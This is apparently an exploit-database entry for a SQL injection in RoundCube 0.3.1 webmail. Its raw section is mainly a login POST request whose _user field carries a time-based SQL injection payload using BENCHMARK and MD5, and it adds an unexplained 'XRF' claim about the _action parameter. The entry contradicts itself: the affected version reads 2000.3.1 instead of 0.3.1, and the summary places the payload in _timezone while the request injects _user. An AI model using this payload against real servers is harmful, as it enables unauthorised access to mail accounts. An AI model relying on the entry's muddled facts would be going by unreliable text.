RoundCube 0.3.1 SQL injection

vendor:

RoundCube

by:

Smith Falcon

7.5

CVSS

HIGH

SQL Union Injection

CWE

Product Name: RoundCube

Affected Version From: 2000.3.1

Affected Version To: 2000.3.1

Patch Exists: YES

Related CWE: N/A

CPE: a:roundcube:roundcube:0.3.1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2011

RoundCube 0.3.1 SQL injection

RoundCube 0.3.1 is vulnerable to SQL Union Injection. An attacker can exploit this vulnerability by sending a POST request to the index.php page with a malicious payload in the _timezone parameter. Additionally, the application is also vulnerable to XRF attacks, which can be exploited by changing the _action parameter to anything. Successful tampering will lead to username compromising.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: RoundCube 0.3.1 SQL injection
# Date: 10/10/2011
# Author: Smith Falcon
# Software Link: http://roundcube.net/download
# Version: 0.3.1
# Tested on: Linux

_timezone=
is vulnerable to SQL Union Injection.

"POST" data in

http://site.com/roundcube/index.php

_pass=FrAmE30.&_url=_task=mail&_timezone=_default_&_token=cd5bf19253710dfd569f09bfab862ab3&_action=login&_user=1'+or+BENCHMARK(2500000%2CMD5(1))+or+'1'='1"


XRF vulnerable [ POC ]

POST variable

changing variable _action=login to "_action=anything" shows you the site is
vulnerable to XRF attacks. When you replay it with HTTP Live headers, you
see a logged in URL which shows the roundcube 0.3.1 is vulnerable to XRF
attacks. Successful tampering will lead to username compromising.

_action=loggedin

Credits - iqZer0